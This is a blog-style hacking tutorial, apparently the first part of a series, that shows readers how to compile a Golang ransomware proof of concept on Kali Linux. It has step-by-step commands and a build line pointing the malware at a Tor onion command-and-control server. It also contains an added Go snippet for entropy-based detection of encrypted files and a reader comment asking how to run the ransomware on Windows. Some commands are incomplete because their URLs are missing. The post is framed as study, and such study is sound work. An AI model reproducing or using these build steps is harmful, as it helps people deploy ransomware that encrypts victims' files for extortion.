
Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!

Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware, including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious: ransomware pays!

To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.

This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.
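For defenders, the practical consequence of AES-CTR is that an encrypted file becomes statistically indistinguishable from random data. The following added example (not code from the original post or from the mauri870 project) flags text-format files whose entropy has jumped to nearly 8 bits per byte; the watch list, thresholds and sample data are assumptions constructed for illustration.

```go
package main

import (
	"crypto/sha256"
	"fmt"
	"math"
	"path/filepath"
	"strings"
)

// shannonEntropy returns the entropy of data in bits per byte (0 to 8).
func shannonEntropy(data []byte) float64 {
	var counts [256]float64
	for _, b := range data {
		counts[b]++
	}
	h, n := 0.0, float64(len(data))
	for _, c := range counts {
		if c > 0 {
			h -= c / n * math.Log2(c/n)
		}
	}
	return h
}

// Assumed watch list of normally low-entropy formats; zip, jpg and docx are compressed and sit near 8 bits/byte anyway.
var textExts = map[string]bool{".txt": true, ".csv": true, ".sql": true, ".log": true}

// suspicious reports whether a text-format file now holds data that is
// statistically indistinguishable from random, as AES-CTR output is.
func suspicious(name string, body []byte) bool {
	ext := strings.ToLower(filepath.Ext(name))
	return textExts[ext] && len(body) >= 4096 && shannonEntropy(body) > 7.9
}

// highEntropySample is constructed test data: a SHA-256 counter stream standing in for ciphertext.
func highEntropySample(n int) []byte {
	var out []byte
	for i := 0; len(out) < n; i++ {
		sum := sha256.Sum256([]byte{byte(i), byte(i >> 8)})
		out = append(out, sum[:]...)
	}
	return out[:n]
}

func main() {
	plain := []byte(strings.Repeat("date,amount,account\n2021-05-07,100.00,ops\n", 400))
	fmt.Println(suspicious("ledger.csv", plain), suspicious("notes.txt", highEntropySample(16384)))
}
```

In a file-integrity monitor, a burst of such hits across many files in a short window is a stronger signal than any single file.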

Step #1: Download and Install the Binaries

The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering:

kali > sudo apt install golang

Next, you will need to log in as the root user.

kali > sudo su -

Now create a directory for the binaries. In this case, I named it simply "git".

kali > mkdir git

Next, change directory (cd) to this directory.

kali > cd git

Next, download the binaries from

kali > git clone

Step #2: Export GO Environment variables

Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.

Step #3: Make the source code dependencies

Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.

kali > cd ransomware

kali > make deps

Step #4: Make the Source Code with options

Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.


Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).


Third, we want to use port 80 (you can use any port).


Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.


Our command should look something like this:

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now hit ENTER and watch your ransomware compile.

Step #5: Check the Directory for ransomware.exe

Once the source code has been generated, do a long listing on the ransomware directory.

kali > ls -l

Now, navigate to the bin directory.

kali > cd bin

Here, you will see the ransomware.exe, the server and unlocker.exe.

Step #6: Examine the Types of Files to be Encrypted

If you want to see what types of files this ransomware will encrypt, navigate to the cmd directory and open common.go.

kali > cd cmd

kali > more common.go

Here, you can see the file extensions that this ransomware will target to encrypt when executed.


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!

This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.

In the second part of this series, we will test this ransomware on a Windows VM.

If you or your team want to learn more about ransomware, our Ransomware training videos are available in our online store.

Thanks very much, sir. This will help me in my college project for sure. I was finding content like this. Can you write how to safely run it on Windows and make it normal without any damage, please, sir?
